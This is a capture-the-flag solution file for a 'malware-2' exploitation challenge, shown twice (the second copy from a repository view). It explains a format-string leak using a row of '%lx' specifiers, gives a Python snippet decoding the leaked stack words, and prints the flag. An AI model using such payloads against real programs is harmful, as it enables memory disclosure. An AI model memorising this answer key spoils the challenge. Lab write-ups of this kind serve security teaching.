write-ups-challenges-2023-2024/malware-2/SOLUTION.md

## Difficulty
50/100

## Category
exploitation

## How To Solve
This binary contains a format string exploit. This can be 
used to leak stack memory. Since the flag is read into 
memory you can pass a format string to the binary and leak
all memory. A string like this would work 
`%lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx`.
You can then use python to take this memory and
convert it to a string. 

```python
dump = [0x63537b4654434749, 0x64316b5f74703172, 0x3352615f73333164, 0x7d336d346c5f]

bs = b""
for b in dump:
    bs += b.to_bytes(8, 'little');

print(bs)
```

## Hints
n/a

## Flag
IGCTF{Scr1pt_k1dd13s_aR3_l4m3}
intitial commit 2023-11-28 15:24:59 +00:00			`## Difficulty`
			`50/100`

			`## Category`
			`exploitation`

			`## How To Solve`
			`This binary contains a format string exploit. This can be`
			`used to leak stack memory. Since the flag is read into`
			`memory you can pass a format string to the binary and leak`
			`all memory. A string like this would work`
			`%lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx %lx`.
			`You can then use python to take this memory and`
			`convert it to a string.`

			```python
			`dump = [0x63537b4654434749, 0x64316b5f74703172, 0x3352615f73333164, 0x7d336d346c5f]`

			`bs = b""`
			`for b in dump:`
			`bs += b.to_bytes(8, 'little');`

			`print(bs)`
			```

			`## Hints`
			`n/a`

			`## Flag`
			`IGCTF{Scr1pt_k1dd13s_aR3_l4m3}`